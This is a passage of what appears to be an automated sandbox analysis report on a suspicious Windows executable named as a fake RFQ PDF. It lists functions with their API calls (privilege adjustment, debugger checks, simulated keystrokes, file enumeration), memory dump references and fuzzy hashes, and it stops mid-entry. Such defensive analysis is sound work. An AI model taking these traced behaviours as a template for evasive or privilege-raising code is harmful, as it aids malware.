                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: 6916c542ec8d6d3d9124ea9b9dda3a325d2b2a1e49e65027034c5c4a020bf991
                                                                                                                • Instruction ID: d2844f649c738fe4bcde64fc717544e639b2ddbb54c75196c834a37e4d5af908
                                                                                                                • Opcode Fuzzy Hash: 6916c542ec8d6d3d9124ea9b9dda3a325d2b2a1e49e65027034c5c4a020bf991
                                                                                                                • Instruction Fuzzy Hash: 5831C87491121C9BCB21DF64DD897DDB7B8AF18350F5082DAE41CA7261E7309F818F45
                                                                                                                Function 00AB51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00AB51DA
                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00AB5238
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00AB52A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1682464887-0
                                                                                                                • Opcode ID: 9cf7aa2e0011a982595bbe8ecefebecc7e81d4317b4905239183b55b0466b98c
                                                                                                                • Instruction ID: 538ec7a0db405eba390b59e78b28182d0ae4d3aa4a8ab31b0be458539247a211
                                                                                                                • Opcode Fuzzy Hash: 9cf7aa2e0011a982595bbe8ecefebecc7e81d4317b4905239183b55b0466b98c
                                                                                                                • Instruction Fuzzy Hash: 4B314D75A005189FDB00DF94D884FEDBBB4FF49314F048099E845AB352DB31E956CB91
                                                                                                                Function 00AA16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A5FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A60668
                                                                                                                  • Part of subcall function 00A5FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A60685
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AA170D
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AA173A
                                                                                                                • GetLastError.KERNEL32 ref: 00AA174A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 577356006-0
                                                                                                                • Opcode ID: f8aa63b29026fa85a20e70e7f04480642231610ca3279c0d8c6952f0a934393c
                                                                                                                • Instruction ID: ebf1a233343bd0a2ffce6cb14052088e466abb9e82580d725a296bb4caf153cb
                                                                                                                • Opcode Fuzzy Hash: f8aa63b29026fa85a20e70e7f04480642231610ca3279c0d8c6952f0a934393c
                                                                                                                • Instruction Fuzzy Hash: C211CEB2400305BFD718EF54DC86D6AB7B9FB04724B20852EE45697281EB70BC42CA20
                                                                                                                Function 00AAD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AAD608
                                                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00AAD645
                                                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AAD650
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 33631002-0
                                                                                                                • Opcode ID: 0c57751b090b959845e383d5243c341951a1a38c013866192d6da585ff279f2c
                                                                                                                • Instruction ID: 55916ba06faeaac0306634a3a6942cc84cf7f9ace51d80c2f702da7e7a5b5a1e
                                                                                                                • Opcode Fuzzy Hash: 0c57751b090b959845e383d5243c341951a1a38c013866192d6da585ff279f2c
                                                                                                                • Instruction Fuzzy Hash: 85118E71E05228BFDB10CF94DC44FAFBBBCEB45B60F108112F905E7290C2704A018BA1
                                                                                                                Function 00AA1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AA168C
                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AA16A1
                                                                                                                • FreeSid.ADVAPI32(?), ref: 00AA16B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429775523-0
                                                                                                                • Opcode ID: 7bd4149bb5b21a3717829b116bfd361c9a834d4b4d39e9b129fa8c6bfab22cdf
                                                                                                                • Instruction ID: c76af76a21b0fd35cef95bfc52e278bb617d775da8bf3edfbb639b0f76718635
                                                                                                                • Opcode Fuzzy Hash: 7bd4149bb5b21a3717829b116bfd361c9a834d4b4d39e9b129fa8c6bfab22cdf
                                                                                                                • Instruction Fuzzy Hash: A9F0F471951309FBDF00DFE49C89AAEBBBCEB08614F904565E501E2181E774AA448A50
                                                                                                                Function 00A64CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00A728E9,?,00A64CBE,00A728E9,00B088B8,0000000C,00A64E15,00A728E9,00000002,00000000,?,00A728E9), ref: 00A64D09
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00A64CBE,00A728E9,00B088B8,0000000C,00A64E15,00A728E9,00000002,00000000,?,00A728E9), ref: 00A64D10
                                                                                                                • ExitProcess.KERNEL32 ref: 00A64D22
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: 4f9260e838afb943477b0a24657eab5d31f911beebcf78468f7b17b6a3eae550
                                                                                                                • Instruction ID: 1410faa33a547472d0a6bd53d8470f1b92a9d412ef4adc01e860ee1fac221f9d
                                                                                                                • Opcode Fuzzy Hash: 4f9260e838afb943477b0a24657eab5d31f911beebcf78468f7b17b6a3eae550
                                                                                                                • Instruction Fuzzy Hash: 82E0B631401149EFCF11AF94DE09A597B79EB45791F508015FC1A8B122CB35DD42DA80
                                                                                                                Function 00A7C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: /
                                                                                                                • API String ID: 0-2043925204
                                                                                                                • Opcode ID: e762b2dea092c8c63ef5d925f2b83147829d4e2af186a8ea93f0ddc4c98a6522
                                                                                                                • Instruction ID: 96ed9000defc74a16df7dcf81cee9b45912ff3885503087edab824b631cabfa4
                                                                                                                • Opcode Fuzzy Hash: e762b2dea092c8c63ef5d925f2b83147829d4e2af186a8ea93f0ddc4c98a6522
                                                                                                                • Instruction Fuzzy Hash: FA414972500219AFCB20AFB9CC48EBBB7B8EB84324F10C26DF909DB181E6309D41CB50
                                                                                                                Function 00A9D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00A9D28C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID: X64
                                                                                                                • API String ID: 2645101109-893830106
                                                                                                                • Opcode ID: 1abadf75d89217a58ed980144c753b80a0160946f342c66b65c278b8165b57af
                                                                                                                • Instruction ID: 4ccb37406d5ea6e26e86a86dcd8d83f6c48e1cc4f7037b966094eafac1d17a7a
                                                                                                                • Opcode Fuzzy Hash: 1abadf75d89217a58ed980144c753b80a0160946f342c66b65c278b8165b57af
                                                                                                                • Instruction Fuzzy Hash: 7CD0C9B480112DEACF90CB90EC88DD9B3BCBB04306F500152F506A2080D73096498F10
                                                                                                                Function 00A6CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                • Instruction ID: 22e52ec1207b46d939c60380833cd67fc89c4c56c97ff498a69e8983582815ee
                                                                                                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                • Instruction Fuzzy Hash: 5C021C71E002199FDF14CFA9C9806ADFBF5FF88324F25816AD959E7380D731AA418B94
                                                                                                                Function 00AB68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AB6918
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB6961
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: fffdaccc1464b1f7840d4e3acdfa15536057a4e89476906598c31ca9c58a5b98
                                                                                                                • Instruction ID: ab9aecf25f6a73614732abc7bda2fd25d2982f5223fe19979fba7675572a1c1b
                                                                                                                • Opcode Fuzzy Hash: fffdaccc1464b1f7840d4e3acdfa15536057a4e89476906598c31ca9c58a5b98
                                                                                                                • Instruction Fuzzy Hash: 4D11B2356042119FD710DF69D484A56BBE5FF85328F14C699F8698F3A2C734EC05CB91
                                                                                                                Function 00AB37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00AC4891,?,?,00000035,?), ref: 00AB37E4
                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00AC4891,?,?,00000035,?), ref: 00AB37F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479602957-0
                                                                                                                • Opcode ID: 59d430ae89ae04b809528b75633fc23d76acee02881dcae5ad30cd42585379fa
                                                                                                                • Instruction ID: db1346b45fe05a382eb7850515e50c7c2674584a68735901dd14c9d5376820cc
                                                                                                                • Opcode Fuzzy Hash: 59d430ae89ae04b809528b75633fc23d76acee02881dcae5ad30cd42585379fa
                                                                                                                • Instruction Fuzzy Hash: 14F055B16012292AEB20A3A68C4CFEB3BAEEFC4771F000222F109D2281C9608D44C7B0
                                                                                                                Function 00AAB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AAB25D
                                                                                                                • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00AAB270
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 3536248340-0
                                                                                                                • Opcode ID: a5885705eb844f2d1ed8e41092508a8557a395bc3036f1e19d7d867411324c1c
                                                                                                                • Instruction ID: 9a9c2266ba49e696966c281e4ab0320e8ae57ebc7508069a1664bffae087d461
                                                                                                                • Opcode Fuzzy Hash: a5885705eb844f2d1ed8e41092508a8557a395bc3036f1e19d7d867411324c1c
                                                                                                                • Instruction Fuzzy Hash: A1F01D7185424EABDB05DFA0C805BEE7BB4FF05315F00804AF955A6192C3798615DFA4
                                                                                                                Function 00AA10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AA11FC), ref: 00AA10D4
                                                                                                                • CloseHandle.KERNEL32(?,?,00AA11FC), ref: 00AA10E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                • Opcode ID: 61fe4c8f3564790fce8b6828ad15b01b60e887fec4c9f40d1fa32152e137ea25
                                                                                                                • Instruction ID: 580ff1b10e7d0a46c178fb13744faeb967af1a8c396d6b7be23f9b08420ec6e4
                                                                                                                • Opcode Fuzzy Hash: 61fe4c8f3564790fce8b6828ad15b01b60e887fec4c9f40d1fa32152e137ea25
                                                                                                                • Instruction Fuzzy Hash: B0E04F32004601AEE7252B51FC06E7377A9FB04321F10882EF8A6804B1DB726C90DB10
                                                                                                                Function 00A4CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • Variable is not of type 'Object'., xrefs: 00A90C40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Variable is not of type 'Object'.
                                                                                                                • API String ID: 0-1840281001
                                                                                                                • Opcode ID: 013c14156f321856ef7b120e482d5338158f997dd251d382a4e0cacee45fd8e2
                                                                                                                • Instruction ID: 8dd5fbe9ca6a74df4fc6e432f4d6176edb14ebc7c41fbceb727ec4a3800e92fe
                                                                                                                • Opcode Fuzzy Hash: 013c14156f321856ef7b120e482d5338158f997dd251d382a4e0cacee45fd8e2
                                                                                                                • Instruction Fuzzy Hash: 8A32AD38A01218DFCF54DF94C981EEDB7B5BF94354F208059E80AAB292DB75AD49CB60
                                                                                                                Function 00A7676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A76766,?,?,00000008,?,?,00A7FEFE,00000000), ref: 00A76998
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID:
                                                                                                                • API String ID: 3997070919-0
                                                                                                                • Opcode ID: 7b64a1ac89eaf7ddef8b96e9934227995e6826d9bb5fe648238a4719d28f28bf
